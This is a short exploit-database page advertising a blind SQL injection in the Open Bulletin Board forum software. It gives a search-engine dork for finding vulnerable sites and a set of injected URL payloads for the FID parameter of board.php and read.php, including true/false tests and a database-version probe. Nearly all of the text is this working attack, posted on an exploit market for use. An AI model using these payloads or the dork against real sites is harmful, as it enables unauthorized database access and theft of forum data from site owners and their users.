[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Open Bulletin Board Multiple Blind Sql Injection Vulnerability

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10769
Category
web applications
Date add
06-02-2010
Platform
unsorted
==============================================================
Open Bulletin Board Multiple Blind Sql Injection Vulnerability
==============================================================

.:. Script : Open Bulletin Board
.:. Bug Type : Blind Sql Injection
.:. Dork : intitle:"Powered by Open Bulletin Board"

===[ Exploit ]===
 
www.site.com/board.php?FID=[Blind Injection]
www.site.com/read.php?FID=[Blind Injection]
 
 
www.site.com/board.php?FID=3+and+1=1 >>> True
www.site.com/board.php?FID=3+and+1=2 >>> False
www.site.com/board.php?FID=3+and+substring(@@version,1,1)=5 >>> True
www.site.com/board.php?FID=3+and+substring(@@version,1,1)=4 >>> False
 
 
www.site.com/read.php?FID=3+and+1=1 >>> True
www.site.com/read.php?FID=3+and+1=2 >>> False
www.site.com/read.php?FID=3+and+substring(@@version,1,1)=5 >>> True
www.site.com/read.php?FID=3+and+substring(@@version,1,1)=4 >>> False
 


#  0day.today [2024-11-15]  #